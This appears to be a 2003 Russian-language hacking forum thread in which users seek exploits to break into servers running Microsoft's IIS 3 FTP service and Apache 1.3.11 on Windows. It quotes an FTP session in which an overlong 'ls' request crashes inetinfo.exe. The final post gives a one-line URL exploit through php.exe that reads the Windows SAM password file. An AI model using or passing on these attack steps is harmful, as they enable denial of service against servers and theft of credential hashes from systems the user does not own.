Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Эксплоит на Microsoft FTP Server v3.0(тобишь IIS3) 15.11.03 23:05
Автор: Likvidator Статус: Незарегистрированный пользователь
|
Ребята не подскажете где можно найти эксплоиты для сабжа. Искал не нашел, что-то не верится что в фтп сервере от IIS3.0 нету багов.
Спасибо...
|
|
Эксплоит на Microsoft FTP Server? Лучше ломать через web-сервер !!! 15.11.03 23:39
Автор: Ilich Статус: Незарегистрированный пользователь
|
|
Можно вопрос? Не уж то не сервере кроме FTP сервака нету самой IIS. Я имею ввиду web-сервре. Короче. если там открыт 80 порт, то воспользуяся одной из кучи уязвимостей IIS'а. Вообще, если уж ломать IIS, то ломать сам web-сервер. Хотя, если честно, я не видел эксплоитов под ftp-сервак, но слышал, что такие есть. Народ, если у кого есть инфа именно по хаку IIS Ftp-Server, то вяжитесь со мной. насчет web-сервера прошу не беспокоить.
|
| |
Эксплоит на Microsoft FTP Server? Лучше ломать через web-сервер !!! 16.11.03 16:46
Автор: Likvidator Статус: Незарегистрированный пользователь
|
Да я в начале тоже немного запулся. В общем на 80 порту зависает Apatch 1.3.11 и перекрывает ИИС. Я для него ничего хорошего не нашел. Можно если кто знает где есть сплоиты для Apatch 1.3.11 пожалуйста скиньте ссылочку.
]d1vEr[ насчет фтп. Я бы написал сам для него эксплоит, но именно но. В google.com набери Microsoft FTP Server (Version 3.0) Exploit. Вот из одних из ссылок написано, что в FTP Server 3.0 есть переполнение:
****************************************
Lets look at the following example attack. [Comments are in brackets.] The server must either have anonymous access rights or an attacker must have an account.
C:\>ftp guilt.xyz.com
Connected to guilt.xyz.com.
220 GUILT Microsoft FTP Service (Version 4.0).
User (marc.xyz.com:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
[The server has now processed our long NLST request and has crashed]
-> ftp: get :Connection reset by peer
[Our ftp client looses connection... that is a given]
The above example uses 316 characters to overflow. This is the smallest possible buffer to pass that will overflow IIS. Lets take a look at the server side happenings. On the server side we have an "Application Error" message for inetinfo.exe. "The instruction at '0x710f8aa2' referenced memory at '0x41414156'. The memory could not be 'read'."
*******************************************
Как написанно в данном дукументе он срабатывает на 3 и 4 иис.Я установил IIS 3.0 и проделав все действия к сожалению переполнения не произошло. Если у кого-то есть информация по переполнениям в этом фтп сервере сообщите пожалуйста, эксплоит как-нибудь накалякую сам.
Благодарю за внимание...
|
| | |
Apache 1.3.11win32-1.3.20win32. 18.11.03 21:32
Автор: Ilich Статус: Незарегистрированный пользователь
|
Например, сли не серваке стоит Apache c PHP, то можно выудить любой файл с сервака. Ниже эксплоит :-)
http://www.example.com/php/php.exe?d:\winnt\repair\sam
А вообще эксплоитов под Апач дофига. ради интереса поищи на www.securitylab.ru
|
|
|
подробно о проекте
Анализ криптографических сетевых...
